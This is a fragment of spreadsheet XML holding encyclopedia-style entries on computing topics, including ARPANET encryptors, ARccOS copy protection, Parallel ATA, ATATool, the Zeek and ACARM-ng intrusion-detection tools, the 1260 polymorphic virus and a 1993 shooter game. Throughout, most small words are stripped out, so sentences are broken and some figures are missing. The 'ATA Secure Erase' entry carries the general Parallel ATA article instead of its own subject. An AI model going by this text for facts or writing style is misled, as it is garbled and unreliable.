    <t>arpanet pioneered creation novel encryption devices packet networks 1970s 1980s, ancestors today's ipsec architecture, high assurance internet protocol encryptor (haipe) devices specifically. dupont fidler provide historical perspective arpanet encryption devices broader evolution computer networks cybersecurity. they focus primarily first arpanet device, private line interface (pli). that said, first series devices created 1970s 1980s arpanet-related research development: private line interface (pli) black-crypto-red (bcr) blacker internet private line interface (ipli) private line interface (pli) private line interface (pli) first packet encryptor, sponsored advanced research projects agency implemented technologies part creation arpanet. early ideation phase 1973, stated goal providing users equivalent private, leased line arpanet. early phase, envisioned provide distinct capabilities: transferring continuous steam arpanet, possibly encrypting stream within arpanet. design progressed, evolved packet encryption device, approved starting 1975 national security agency limited deployment arpanet, protect classified data passed network. each device incorporated kg-34 encryption device, result manually keyed system. black-crypto-red (bcr) black-crypto-red (bcr) experimental, end-to-end, network packet encryption system developed working prototype form collins radio division rockwell 1975-1980. first network security system support tcp/ip traffic ipv3, incorporated first data encryption standard (des) chips validated u.s. national bureau standards (now called nist). provided automated, kdc-based management access control later adopted kerberos blacker), supported header bypass. blacker first blacker program began late 1970s, follow-on eventually producing fielded devices late 1980s. sponsored national security agency high assurance (a1), multi-level security system, developed (software) burroughs (hardware), merger, resultant company unisys. internet private line interface (ipli) internet private line interface (ipli) created successor pli. updated tcp/ip (ipv4) newer comsec technology (kg-84), still manually keyed. they intended defense data network also darpa low-cost packet radios suran project. references</t>
  </si>
  <si>
    <t>ARccOS protection</t>
  </si>
  <si>
    <t>arccos (advanced regional copy control operating solution) copy-protection system made sony used dvds. designed additional layer used conjunction content scramble system (css), system deliberately creates corrupted sectors dvd, cause copying software produce errors (see sector). corrupted sectors areas disk players access, copying software does. despite promoted "fully compatible available players drives," dvds arccos cannot played players: sony dvpcx995, toshiba sd4700, harman kardon dvd101, microsoft xbox others. sony announced future firmware update players incompatibility issue. revision arccos scheme used sony incompatible higher number players average. sony offered replace discs owners problems; replacement discs newer version arccos coding them, sony claims compatible. some rental companies warned users sony dvds question play machines. many rippers designed overcome arccos protection; also naturally overcome using ddrescue, linux utility designed copy images errors. references</t>
  </si>
  <si>
    <t>ATA Secure Erase</t>
  </si>
  <si>
    <t>parallel (pata), originally attachment, also known standard interface designed pc-compatible computers. first developed western digital compaq 1986 compatible hard drives drives. connection used storage devices hard disk drives, floppy disk drives, optical disc drives computers. standard maintained x3/incits committee. uses underlying attachment (ata) attachment packet interface (atapi) standards. parallel standard result long history incremental technical development, began original attachment interface, developed early equipment. interface evolved several stages western digital's original integrated drive electronics (ide) interface. result, many near-synonyms ata/atapi previous incarnations still common informal use, particular extended (eide) ultra (uata). after introduction serial (sata) 2003, original renamed parallel ata, pata short. parallel cables maximum allowable length (457 mm). because limit, technology normally appears internal computer storage interface. many years, provided common least expensive interface application. largely replaced sata newer systems. history terminology standard originally conceived attachment," officially called attachment" abbreviated "ata" primary feature direct connection 16-bit introduced pc/at. original specifications published standards committees name attachment". "at" pc/at referred "advanced technology" also referred "advanced technology attachment". when newer serial (sata) introduced 2003, original renamed parallel ata, pata short.physical interfaces became standard component pcs, initially host adapters, sometimes sound card ultimately physical interfaces embedded southbridge chip motherboard. called "primary" "secondary" interfaces, assigned base addresses 0x1f0 0x170 systems. they replaced sata interfaces. ata-1 first version called ata/atapi interface developed western digital name integrated drive electronics (ide). together control data corporation (the hard drive manufacturer) compaq computer (the initial customer), developed connector, signaling protocols goal remaining software compatible existing st-506 hard drive interface. first drives appeared internally compaq 1986. first separately offered conner peripherals cp342 june 1987.the term integrated drive electronics refers fact drive controller integrated drive, opposed separate controller situated side connection cable drive. compatible, cp/m machine, similar, typically card installed motherboard. interface cards used connect parallel drive example, slot drive controllers: merely bridges host interface. since original interface essentially 16-bit disguise, bridge especially simple case connector located interface card. integrated controller presented drive host computer array 512-byte blocks relatively simple command interface. this relieved mainboard interface cards host computer chores stepping disk head arm, moving head out, done earlier st-506 esdi hard drives. low-level details mechanical operation drive handled controller drive itself. this also eliminated need design single controller could handle many different types drives, since controller could unique drive. host need particular sector, block, read written, either accept data drive send data interface used drives standardized 1994 ansi standard x3.221-1994, attachment interface disk drives. after later versions standard developed, became known "ata-1".a short-lived, seldom-used implementation created similar machines used 8-bit version bus. referred "xt-ide", "xta" attachment". eide ata-2 1994, time ata-1 standard adopted, western digital introduced drives newer name, enhanced (eide). these included features forthcoming ata-2 specification several additional enhancements. other manufacturers introduced variations ata-1 "fast ata" "fast ata-2". version ansi standard, attachment interface extensions ata-2 (x3.279-1996), approved 1996. included features manufacturer-specific variants.ata-2 also first note devices hard drives could attached interface: 3.1.7 device: device storage peripheral. traditionally, device interface hard disk drive, form storage device placed interface provided adheres standard. atapi mentioned previous sections, originally designed for, worked hard disk drives devices could emulate them. introduction atapi (ata packet interface) group called small form factor committee (sff) allowed used variety devices require functions beyond necessary hard disk drives. example, removable media device needs "media eject" command, host determine whether media present, provided protocol. small form factor committee approached problem defining atapi, "ata packet interface". atapi actually protocol allowing interface carry scsi commands responses; therefore, atapi devices actually "speaking scsi" electrical interface. fact, early atapi devices simply scsi devices ata/atapi scsi protocol converter added scsi commands responses embedded "packets" (hence "ata packet interface") transmission cable. this allows device class scsi command defined interfaced ata/atapi. atapi devices also "speaking ata", physical interface protocol still used send packets. hand, hard drives solid state drives atapi. atapi devices include cd-rom dvd-rom drives, tape drives, large-capacity floppy drives drive superdisk drive. scsi commands responses used class atapi device (cd-rom, tape, etc.) described documents specifications specific device classes within ata/atapi committee's purview. commonly used defined scsi command set. atapi adopted part incits 317-1998, attachment packet interface extension (ata/atapi-4). udma ata-4 ata/atapi-4 standard also introduced several "ultra dma" transfer modes. these initially supported speeds mbyte/s mbyte/second. later versions, faster ultra modes added, requiring 80-wire cables reduce crosstalk. latest versions parallel support mbyte/s. ultra ultra ata, abbreviated uata, designation primarily used western digital different speed enhancements ata/atapi standards. example, 2000 western digital published document describing "ultra ata/100", brought performance improvements then-current ata/atapi-5 standard improving maximum speed parallel interface mb/s. most western digital's changes, along others, included ata/atapi-6 standard (2002). current terminology terms "integrated drive electronics" (ide), "enhanced ide" "eide" come used interchangeably (now parallel ata, pata). addition, several generations "eide" drives marketed, compliant various versions specification. early "eide" drive might compatible ata-2, later ata-6. nevertheless, request "ide" "eide" drive computer parts vendor almost always yield drive work parallel interfaces. another common usage refer specification version fastest mode supported. example, ata-4 supported ultra modes latter providing maximum transfer rate megabytes second. ata-4 drives thus sometimes called "udma-33" drives, sometimes "ata-33" drives. similarly, ata-6 introduced maximum transfer speed megabytes second, drives complying version standard marketed "pata/100" drives. bios size limitations initially, size drive stored system bios using type number predefined c/h/s parameters also often landing zone, drive heads parked use. later, "user definable" format called c/h/s cylinders, heads, sectors made available. these numbers important earlier st-506 interface, generally meaningless ata—the parameters later large drives often specified impossibly high numbers heads sectors actually define internal physical layout drive all. from start, ata-2, every user specify explicitly large every attached drive was. from ata-2 "identify drive" command implemented sent return drive parameters. owing lack foresight motherboard manufacturers, system bios often hobbled artificial c/h/s size limitations manufacturer assuming certain values would never exceed particular numerical maximum. first bios limits occurred drives reached sizes excess mib, motherboard bioses would allow c/h/s values 1024 cylinders, heads, sectors. multiplied bytes sector, totals 528482304 bytes which, divided 1048576 bytes mib, equals (528 mb). second bios limitations occurred 1024 cylinders, heads, sectors, problem ms-dos limited number heads 255. this totals 8422686720 bytes (8032.5 mib), commonly referred gigabyte barrier. this limit imposed bioses, limit imposed interface. eventually determined size limitations could overridden small program loaded startup hard drive's boot sector. some hard drive manufacturers, western digital, started including override utilities large hard drives help overcome problems. however, computer booted manner without loading special utility, invalid bios settings would used drive could either inaccessible appear operating system damaged. later, extension bios disk services called "enhanced disk drive" (edd) made available, makes possible address drives large sectors. interface size limitations first drive interface used 22-bit addressing mode resulted maximum drive capacity gigabytes. later, first formalized specification used 28-bit addressing mode lba28, allowing addressing (268435456) sectors (blocks) bytes each, resulting maximum capacity (137 gb).ata-6 introduced 48-bit addressing, increasing limit (144 pb). consequence, drive capacity larger must ata-6 later drive. connecting drive host ata-5 earlier interface limit usable capacity maximum interface. some operating systems, including windows pre-sp1, windows 2000 pre-sp3, disable lba48 default, requiring user take extra steps entire capacity drive larger gigabytes.older operating systems, windows support 48-bit all. however, members third-party group msfn modified windows disk drivers unofficial support 48-bit windows osr2, windows windows windows some 16-bit 32-bit operating systems supporting lba48 still support disks larger using 32-bit arithmetic only; limitation also applying many boot sectors. primacy obsolescence parallel (then simply called ide) became primary storage device interface soon introduction. systems, third fourth motherboard interface provided, allowing eight devices attached motherboard. often, additional connectors implemented inexpensive raid controllers. soon introduction serial (sata) 2003, parallel declined. first motherboards built-in sata interfaces usually single pata connector (for pata devices), along multiple sata connectors. some laptops sata hard disk optical drive connected pata. 2007, chipsets, example intel ich10, removed support pata. motherboard vendors still wishing offer parallel chipsets must include additional interface chip. recent computers, parallel interface rarely used even present, four serial connectors usually provided motherboard sata devices types common. with western digital's withdrawal pata market, hard disk drives pata interface longer production december 2013 specialty applications. parallel interface parallel cables transfer data bits time. traditional cable uses 40-pin female connectors attached 80-conductor ribbon cable. each cable three connectors, plugs host adapter interfacing rest computer system. remaining connector(s) plug storage devices, commonly hard disk drives optical drives. each connector physical pins arranged rows, round parallel cables opposed ribbon cables) eventually made available 'case modders' cosmetic reasons, well claims improved computer cooling easier handle; however, ribbon cables supported specifications. 20in standard, defined mechanical used. this pin's socket female connector often obstructed, requiring omitted male cable drive connector; thus impossible plug wrong round. however, flash memory drives vcc_in power drive without requiring special power cable; feature used equipment supports 28pin gray (slave/middle) connector 80-conductor cable attached conductor cable. attached normally black (master drive end) blue (motherboard end) connectors. this enables cable select functionality. 34pin connected ground inside blue connector 80-conductor cable attached conductor cable, allowing detection cable. attached normally gray black connectors. 44-pin variant 44-pin variant pata connector used inch drives inside laptops. pins closer together connector physically smaller 40-pin connector. extra pins carry power. 80-conductor variant ata's cables conductors history conductors smaller form-factor version used 2.5" drives—the extra four power), 80-conductor version appeared introduction udma/66 mode. additional conductors cable grounds, interleaved signal conductors reduce effects capacitive coupling neighboring signal conductors, reducing crosstalk. capacitive coupling problem higher transfer rates, change necessary enable megabytes second (mb/s) transfer rate udma4 work reliably. faster udma5 udma6 modes also require 80-conductor cables. though number conductors doubled, number connector pins pinout remain 40-conductor cables, external appearance connectors identical. internally, connectors different; connectors 80-conductor cable connect larger number ground conductors ground pins, connectors 40-conductor cable connect ground conductors ground pins one-to-one. 80-conductor cables usually come three differently colored connectors (blue, black, gray controller, master drive, slave drive respectively) opposed uniformly colored 40-conductor cable's connectors (commonly gray). gray connector 80-conductor cables csel connected, making slave position drives configured cable select. differences connectors image right shows pata connectors removal strain relief, cover, cable. bottom left connectors, left, etc., except lower image blue connector shows view opposite side, right. connector insulation-displacement connector: contact comprises pair points together pierce insulation ribbon cable precision make connection desired conductor without harming insulation neighboring conductors. center contacts connected common ground attach numbered conductors cable. contacts even-numbered sockets connector (mating even-numbered pins receptacle) attach every even-numbered conductor cable. bottom contacts odd-numbered sockets connector (mating odd-numbered pins receptacle) attach remaining even-numbered conductors cable. note connections common ground sockets (top left), (center bottom row), connectors. also note (enlarged detail, bottom, looking opposite side connector) socket blue connector contact conductor unlike socket connectors, connect common ground bus. gray connector, note socket completely missing, drive attached gray connector open. black connector, sockets completely normal, pins drive attached black connector connected cable. black drive reaches host receptacle gray drive, black drive reaches gray drive host. instead, host grounded. standard dictates color-coded connectors easy identification installer cable maker. three connectors different another. blue (host) connector socket connected ground inside connector attached conductor cable. since conductor cables ground presence ground connection indicates conductor cable installed. conductor attached normally types grounded. installing cable backwards (with black connector system board, blue connector remote device gray connector center device) ground remote device connect host center device. gray center connector omits connection connects normally, black connector connects pins normally. multiple devices cable devices attached single cable, must designated device past, commonly designated master) device past, commonly designated slave). this distinction necessary allow drives share cable without conflict. device drive drive usually appears "first" computer's bios and/or operating system. personal computers drives often designated "c:" device "d:" device referring active primary partitions each. terms device drive used interchangeably industry, master drive master device. mode device must often jumper setting device itself, must manually device (master) device (slave). single device cable, configured device however, certain drives special setting called single configuration (western digital, particular). also, depending hardware software available, single drive cable often work reliably even though configured device drive (most often seen optical drive device secondary interface). words primary secondary typically refers cables, drives (primary master, primary slave, secondary master, secondary slave). cable select drive mode called cable select described optional ata-1 come fairly widespread ata-5 later. drive "cable select" automatically configures device device according position cable. cable select controlled host adapter grounds pin; device sees grounded, becomes device device; sees open, device becomes device device. this setting usually chosen jumper setting drive called "cable select", usually marked separate device setting. note drives configured device device manually, configuration need correspond position cable. used drives know position cable; used host communicating drives. with 40-conductor cable, common implement cable select simply cutting wire device connectors; putting device device cable, device middle connector. this arrangement eventually standardized later versions. device 2-drive cable, using middle connector, results unused stub cable, undesirable physical convenience electrical reasons. stub causes signal reflections, particularly higher transfer rates. starting 80-conductor cable defined atapi5/udma4, device device goes far-from-the-host 18-inch (460 cable black connector, slave device goes gray middle connector, blue connector goes host (e.g. motherboard connector, card). (device device two-drive cable, using black connector, cable stub cause reflections. also, cable select implemented device device connector, usually simply omitting contact connector body. serialized, overlapped, queued operations parallel protocols ata-3 require command given interface, must complete subsequent command given. operations devices must serialized‍—‌with operation progress time‍—‌with respect host interface. useful mental model host interface busy first request entire duration, therefore told another request first complete. function serializing requests interface usually performed device driver host operating system. ata-4 subsequent versions specification included "overlapped feature set" "queued feature set" optional features, given name "tagged command queuing" (tcq), reference features scsi version attempts emulate. however, support extremely rare actual parallel products device drivers feature sets implemented maintain software compatibility heritage originally extension bus. this implementation resulted excessive utilization largely negated advantages command queuing. contrast, overlapped queued operations common storage buses; particular, scsi's version tagged command queuing need compatible apis designed isa, allowing attain high performance overhead buses supported first party like pci. this long seen major advantage scsi. serial standard supported native command queueing (ncq) since first release, optional feature host adapters target devices. many obsolete motherboards support ncq, modern sata hard disk drives sata solid-state drives usually support ncq, case removable (cd/dvd) drives atapi command used control prohibits queued operations. devices cable—speed impact there many debates much slow device impact performance faster device cable. there effect, debate confused blurring quite different causes, called "lowest speed" "one operation time". "lowest speed" early host adapters, devices' data transfers constrained speed slower device, devices different speed capabilities cable. modern host adapters, true, modern host adapters support independent device timing. this allows device cable transfer data best speed. even earlier adapters without independent timing, effect applies data transfer phase read write operation. "one operation time" this caused omission overlapped queued feature sets parallel products. only device cable perform read write operation time; therefore, fast device cable slow device heavy find wait slow device complete task first. however, modern devices report write operations complete data stored onboard cache memory, data written (slow) magnetic storage. this allows commands sent device cable, reducing impact "one operation time" limit. impact system's performance depends application. example, copying data optical drive hard drive (such software installation), effect probably matter. such jobs necessarily limited speed optical drive matter hard drive question also expected provide good throughput tasks time, probably cable optical drive. passwords security devices support optional security feature defined specification, thus specific brand device. security feature enabled disabled sending special commands drive. device locked, refuse access unlocked. device passwords: user password master password; either set. there master password identifier feature which, supported used, identify current master password (without disclosing it). device locked modes: high security mode maximum security mode. word identify response shows mode disk high, maximum. high security mode, device unlocked either user master password, using "security unlock device" command. there attempt limit, normally disk must power cycled hard-reset unlocking attempted again. also high security mode, security erase unit command used either user master password. maximum security mode, device unlocked user password. user password available, remaining least bare hardware back usable state issue security erase prepare command, immediately followed security erase unit. maximum security mode, security erase unit command requires master password completely erase data disk. word identify response indicates long operation take.while lock intended impossible defeat without valid password, purported workarounds unlock device. external parallel devices short cable length specification shielding issues extremely uncommon find external pata devices directly pata connection computer. device connected externally needs additional cable length form u-shaped bend external device placed alongside, computer case, standard cable length short permit this. ease reach motherboard device, connectors tend positioned towards front edge motherboards, connection devices protruding front computer case. this front-edge position makes extension back external device even difficult. ribbon cables poorly shielded, standard relies upon cabling installed inside shielded computer case meet emissions limits. external hard disk drives optical disk drives internal pata interface, interface technology bridge distance external device computer. common external interface, followed firewire. bridge chip inside external devices converts interface pata, typically supports single external device without cable select master/slave. compact flash interface compact flash mode essentially miniaturized interface, intended devices flash memory storage. interfacing chips circuitry required, directly adapt smaller socket onto larger connector. (although cards support mode pio4, making much slower mode capable speed) connector specification include pins supplying power device, power inserted connector separate source. exception device connected 44-pin designed 2.5-inch hard disk drives, commonly found notebook computers, implementation must provide power standard hard disk drive. devices designated devices interface, though since devices offer single socket, necessary offer selection users. although hot-pluggable additional design methods, default wired directly interface, intended hot-pluggable. standards versions, transfer rates, features following table shows names versions standards transfer modes rates supported each. note transfer rate mode (for example, 66.7 mb/s udma4, commonly called "ultra-dma 66", defined ata-5) gives maximum theoretical transfer rate cable. this simply bytes multiplied effective clock rate, presumes every clock cycle used transfer end-user data. practice, course, protocol overhead reduces value. congestion host adapter attached also limit maximum burst transfer rate. example, maximum data transfer rate conventional mb/s, shared among active devices bus. addition, hard drives existed 2005 capable measured sustained transfer rates mb/s. furthermore, sustained transfer rate tests give realistic throughput expectations workloads: they loads specifically designed encounter almost delays seek time rotational latency. hard drive performance workloads limited first second factors; transfer rate distant third importance. therefore, transfer speed limits mb/s really affect performance hard drive satisfy requests reading internal cache—a unusual situation, especially considering data usually already buffered operating system. july 2021, mechanical hard disk drives transfer data mb/s, beyond capabilities pata/133 specification. high-performance solid state drives transfer data 7000–7500 mb/s.only ultra modes detect errors data transfer controller drive. this 16-bit crc, used data blocks only. transmission command status blocks fast signaling methods would necessitate crc. comparison, serial ata, 32-bit used commands data. features introduced revision speed defined transfer modes related standards, features, proposals atapi removable media device (armd) atapi devices removable media, drives, classified armd (atapi removable media device) appear either super-floppy (non-partitioned media) hard drive (partitioned media) operating system. these supported bootable devices bios complying atapi removable media device bios specification, originally developed compaq computer corporation phoenix technologies. specifies provisions bios personal computer allow computer bootstrapped devices drives, drives, superdisk (ls-120) drives, similar devices. these devices removable media like floppy disk drives, capacities commensurate hard drives, programming requirements unlike either. limitations floppy controller interface devices atapi devices, connected host computer's interfaces, similarly hard drive cd-rom device. however, existing bios standards support devices. armd-compliant bios allows devices booted used operating system without requiring device-specific code bios implementing armd allows user include armd devices boot search order. usually armd device configured earlier boot order hard drive. similarly floppy drive, bootable media present armd drive, bios boot not, bios continue search order, usually hard drive last. there variants armd, armd-fdd armd-hdd. originally armd caused devices appear sort large floppy drive, either primary floppy drive device secondary device 01h. some operating systems required code changes support floppy disks capacities larger standard floppy disk drive. also, standard-floppy disk drive emulation proved unsuitable certain high-capacity floppy disk drives iomega drives. later armd-hdd, armd-"hard disk device", variant developed address issues. under armd-hdd, armd device appears bios operating system hard drive. ethernet august 2004, hopkins brantley coile coraid specified lightweight ethernet protocol carry commands ethernet instead directly connecting pata host adapter. this permitted established block protocol reused storage area network (san) applications. also references external links ce-ata workgroup</t>
  </si>
  <si>
    <t>ATATool</t>
  </si>
  <si>
    <t>atatool freeware software used display modify disk information microsoft windows environment. software typically used manage host protected area (hpa) device configuration overlay (dco) features broadly similar hdparm linux. recent versions include support restore freeze operations, security (password) operations simulated sectors. usage examples atatool must administrator privileges. windows vista later requires elevated-privileges command prompt (see user account control). display detected hard disks: atatool /list display information hard disk atatool /info \\.\physicaldrive1 10gb hard disk (volatile lost next power cycle): atatool /sethpa:10gb \\.\physicaldrive1 10gb hard disk (non-volatile): atatool /nonvolatilehpa /sethpa:10gb \\.\physicaldrive1 remove 10gb hard disk (non-volatile): atatool /nonvolatilehpa /resethpa \\.\physicaldrive1 hard disk atatool /setdco:5gb \\.\physicaldrive1 remove hard disk atatool /restoredco:5gb \\.\physicaldrive1 data safety atatool permanently change disk configuration, result permanent data loss making sectors disk inaccessible. tool therefore used extreme care. also hdparm host protected area (hpa) device configuration overlay (dco) references external links atatool</t>
  </si>
  <si>
    <t>Zarafa (software)</t>
  </si>
  <si>
    <t>zarafa open-source groupware application originated city delft netherlands. company developed zarafa, previously known connectux, also called zarafa. zarafa groupware provided email storage server side offered ajax-based mail client called webaccess html5-based, webapp. advanced features available commercially supported versions ("small business", "professional" "enterprise" (different feature levels)). zarafa superseded kopano. zarafa originally designed integrate microsoft office outlook intended alternative microsoft exchange server. connectivity microsoft outlook provided proprietary client-side plugin. support plugin discontinued q1/2016, though outlook activesync implementation instead. webapp (and webaccess) "look-and-feel" outlook owa. software handles personal address-book, calendar, notes tasks, "public folders", shared calendar (inviting internal external users, resource management), exchange files, video chat. open source edition support mapi-based outlook users, community edition supports three outlook users.all server-side components webapp/webaccess zarafa published affero general public license (agpl), based general public license, version (gplv2). introducing maintaining dual-licensing strategy, september 2008 zarafa released full core software, server side software stack, affero general public license, version (agplv3). technology zarafa provides groupware functionality connecting linux-based server outlook clients using mapi. communication server client based upon soap technology. connection outlook clients secured using tls/ssl, either directly zarafa server program client, https proxy. data generally stored mysql database, although attachments saved filesystem. zarafa server user information ldap, active directory, unix user accounts mysql database. webmail based html5 (webapp) ajax technology (webaccess), backend using mapi extension. other clients connect pop3, imap icalendar/caldav. zarafa initiated project called z-push october 2007. supports exchange activesync compatible devices (symbian, pocket iphone (firmware higher), android (version higher), nokia (mail4exchange)) implementing activesync protocol using incremental change system (ics) provided php-mapi extension. also list collaborative software references publications peter wijngaarden: linux magazine sep/2006, zarafa extended real-time ldap coupling sebastian kummer manfred kutas: linux magazine (usa) feb/2008 zarafa exchange alternative, linux media münchen, 2007 roberto galoppini davide galletti: open source messaging collaboration: zarafa, open source 2011 external links official website</t>
  </si>
  <si>
    <t>ACARM-ng</t>
  </si>
  <si>
    <t>acarm-ng (alert correlation, assessment reaction module next generation) open source ids/ips system. acarm-ng alert correlation software significantly facilitate analyses traffic computer networks. responsible collection correlation alerts sent network host sensors, also referred nids hids respectively. correlation process aims reduce total number messages need viewed system administrator possible merging similar events groups representing logical pieces malicious activity. history initial version acarm developed frame positif european research project 2004 2007. written java practical proof concept, presented article. despite poor scalability efficiency issues, software proved highly useful. 2009 became obvious current design serious shortcomings poor performance first place. result project discontinued. later year, project nicknamed acarm-ng launched aiming replace original acarm. acarm-ng bring alert correlation dimension thank scalability plug-in-based architecture. actively developed since 2009 wroclaw centre networking supercomputing part pl-grid project. features acarm-ng's main features include: generic framework (system easily extended plug-ins) multi-threaded implementation utilisation memory footprint implementation using state-of-art, object oriented design methods recurrent alerts processing real-time informing reaction web-based data visualisation long correlation time windows, delay reporting architecture acarm-ng consists main elements: correlation daemon, (optional) database engine. acarm-ng's daemon designed scratch framework solution. provides core system functionalities, like logging, alerts correlated meta-alerts passing system parts, error recovery, multi-threading, etc.. rest package plug-ins, separated following classes: persistency (data abstraction) input (data gathering) filter (data correlation modification) trigger (automatic reporting reaction)built-in software watchdog provides up-to-date information system status. makes browsing correlated data easy graphical tabular representation gathered correlated events. system administrator easily going every moment system's lifetime. daemon interoperate database. daemon stores gathered data along correlation results runtime configuration. entitled read display data. notice even though data base engine required running daemon, strongly recommended save data persistently. rejecting database makes impossible obtain system information leads loss historical data system restarted. events longer processed daemon discarded well. preprocessor often required limit amount incoming data (for example: remove alerts raised periodically cron scripts). order allow users adapt system's input needs special "preprocessor" component provided. allows define chain accept-if-match reject-if-match rules accept reject incoming alerts enter correlation engine. plugins acarm-ng's daemon allows addition removal plug-ins without need recompile core package. makes system development testing much easier. each plug-in used, configured main configuration file first. persistency persistency provides abstraction storage level. this generic interface used implement data-saving back-end, long transaction mechanism provided. recent, stable release acarm-ng provides following persistency implementations: stubs (ignores write requests data saved) postgres (uses postgresql data base storing information) input input provides abstraction data gathering mechanism. requirement implementation output alerts acarm-ng-compatible form. recent, stable release acarm-ng provides following input implementations: file (reads files idmef format) prelude (read alerts prelude-manager data gathering point) filter filter provides abstraction correlation data update mechanism. there restrictions filter meta-alert, though common correlate similar alerts (specially tuned provided special case). recent, stable release acarm-ng provides following filter implementations: (correlates events pair hosts) many (correlates events, source host alerts) many (correlates events, destination host alerts) many many (correlates events, source destination hosts correlated alerts similar) resolver (resolves addresses names, possible) black list (changes priority alerts source/destination addresses belonging suspicious networks) name (correlates events name) event chain (correlates events happened chronological order, next-in-line machines; solution rare indicate "scan, brake-in, escalation" sequence) users monitor (correlates events triggered actions user) similarity (correlates events similar other, given threshold; data taken consideration comparison elements) event (changes priority events, previously seen system) python (uses user-provided python script event correlation) trigger trigger provides abstraction reporting reaction mechanism. triggers design, allowed change content data, initiate response alerts. typical real-time reporting suspicious events administrators (for example e-mail) automatic reaction detected thread (for example blocking malicious host firewall). recent, stable release acarm-ng provides following trigger implementations: informing administrator suspicious events: file (creates files idmef format, correlated events) (uses gadu-gadu instant messenger's protocol) jabber (uses xmpp (formerly named jabber) instant messenger's protocol) mail (sends electronic mail) providing means automatic reaction: extapp (executes external application/script, passing correlated events parameter) python (uses user-provided python script event correlation) snort (reconfigures many types firewalls using snort's snort plug-in)each trigger independently react specific threshold, correlated alerts count, rule, defined daemon's main preprocessor. such approach gives fully configurable solution, allowing define arbitrary complex rules, minimize false-positives, especially system configured perform autonomous reaction suspicious events. also intrusion detection system (ids) intrusion prevention system (ips) prelude hybrid snort references external links official website acarm-ng sourceforge main development branch (bazaar repository) positif folder</t>
  </si>
  <si>
    <t>Zeek</t>
  </si>
  <si>
    <t>zeek free open-source software network analysis framework. vern paxson began development work zeek 1995 lawrence berkeley national lab. zeek network security monitor (nsm) also used network intrusion detection system (nids). zeek project releases software license. output zeek's purpose inspect network traffic generate variety logs describing activity sees. complete list files available project documentation site. example following example entry json format conn.log:{ "ts": 1554410064.698965, "uid": "cmreaf3tggk2whbqhh", "id.orig_h": "192.168.144.130", "id.orig_p": 64277, "id.resp_h": "192.168.144.2", "id.resp_p": "proto": "udp", "service": "dns", "duration": 0.320463, "orig_bytes": "resp_bytes": 316, "conn_state": "sf", "missed_bytes": "history": "dd", "orig_pkts": "orig_ip_bytes": 150, "resp_pkts": "resp_ip_bytes": 372, "tunnel_parents": threat hunting zeek's primary cases involves cyber threat hunting. name paxson originally named software "bro" warning regarding george orwell's brother novel nineteen eighty-four. 2018 project leadership team decided rename software. lbnl 1990s, developers sensors pseudo-user named “zeek”, thereby inspiring name change 2018. zeek deployment security teams identify locations network desire visibility. they deploy network taps enable switch span ports port mirroring gain access traffic. they deploy zeek servers access visibility points. zeek software server deciphers network traffic logs, writing local disk remote storage. zeek application architecture analyzers zeek's event engine analyzes live recorded network traffic generate neutral event logs. zeek uses common ports dynamic protocol detection (involving signatures well behavioral analysis) identify network protocols.developers write zeek policy scripts turing complete zeek scripting language. default zeek logs information events files, analysts also configure zeek take actions, sending email, raising alert, executing system command, updating internal metric, calling another zeek script. zeek analyzers perform application layer decoding, anomaly detection, signature matching connection analysis. zeek's developers designed software incorporate additional analyzers. latest method creating protocol analyzers relies spicy framework. references external links zeek network security monitor bro: system detecting network intruders real-time vern paxson zeek nedir? nasıl kurulur? kernelblog emre yılmaz turkish)</t>
  </si>
  <si>
    <t>Zeero</t>
  </si>
  <si>
    <t>zeero tru64 unix command/utility zeros disks prior rewrite. purpose efficient writing zeros disk (device file) using /dev/zero data erasure removing sensitive data disk, disk partition. shred would secure, installed default tru64 systems. references</t>
  </si>
  <si>
    <t>1260 (computer virus)</t>
  </si>
  <si>
    <t>1260, v2px, demonstration computer virus written 1989 mark washburn used form polymorphic encryption. derived ralf burger's publication disassembled vienna virus source code, 1260 added cipher varied signature randomizing decryption algorithm. both 1260 vienna infect .com files current path directories upon execution. changing authenticated executable file detected modern computer operating systems. references</t>
  </si>
  <si>
    <t>ZoneAlarm Z100G</t>
  </si>
  <si>
    <t>zonealarm secure wireless router z100g discontinued unified threat management security router home soho market. z100g developed sofaware technologies, check point company. hardware similar sofaware's safe@office vpn-1 edge lines, software differs features license allows user access degree. features zonealarm z100g provides networking security related features, including router fast ethernet ports port. wireless access point mbit/s super extended range (xr) technologies. stateful inspection firewall remote access single user time intrusion prevention gateway antivirus filtering print server security reporting integrated activex remote desktop client connect internal computers performance firewall throughput mbit/s throughput mbit/s (aes) concurrent firewall connections 4,000 external links zonealarm z100g home page zonealarm z100g technical specifications</t>
  </si>
  <si>
    <t>Zone 66</t>
  </si>
  <si>
    <t>zone down, multidirectional shooter released 1993 compatibles shareware. game created north american demoscene group called renaissance, published epic megagames. game shipped self-booting disk, could bypass ms-dos load custom protected mode environment. plot distant future, ex-gsa pilot tipped stranger hometown danger, time reaches city limits, nuclear bomb destroys city along beloved wife baby girl. pilot uses ship landing meet stranger certain location. when pilot reaches location, finds stranger dying obtains vital information. pilot gets fighter plane heads group islands begin vigilante revenge. pilot progresses nation nation destroying base, plot thickens begins understand dealing terrorism started. gameplay before starting selected mission, player must choose type aircraft. different planes different statistics. when plane selected player decide weapons take extent payload limit. after plane inventory arranged mission begin starting supply bay. player also return supply restock repair, change aircraft type change weapon types quantities. player makes loaded weapons destroy land targets. bombs launched target indicator right front plane. addition weapons player types maneuvers counter hostilities ease. player infinite chances unless supply bays destroyed. player also radar guide. main ground targets must destroyed complete mission. soundtracks three different soundtracks available game, depending user's sound card. sound blaster soundtrack composed synthesis sounds digital samples. this particular method music creation playback unique renaissance demogroup. adlib soundtrack consisted solely synthesis sounds, adlib sound cards incapable playing digital audio. some songs adlib soundtrack arrangements sound blaster soundtrack, others completely different songs altogether., third, separately downloadable soundtrack available owners gravis ultrasound sound card featuring high quality music. like adlib soundtrack, ultrasound's tracks completely different songs, whereas others arrangements songs found adlib sound blaster versions.the reason separate "gus" music download size gravis music: nearly large original game, users sound blaster adlib waste time downloading music would never hear. disc versions game included three, players need download game. release zone released primarily shareware, floppy disks, cd-rom. first mission released distributed shareware software. software released first four missions game floppy disk; missions released together floppy disk, missions epic megagames released first four missions floppy disks. finally, eight missions released cd-rom. reception computer gaming world 1993 recommended zone "joystick jockeys", stated "occasional thumb twitchers find action much bear, title quite intense". references external links zone mobygames</t>
  </si>
  <si>
    <t>Zombie Zero</t>
  </si>
  <si>
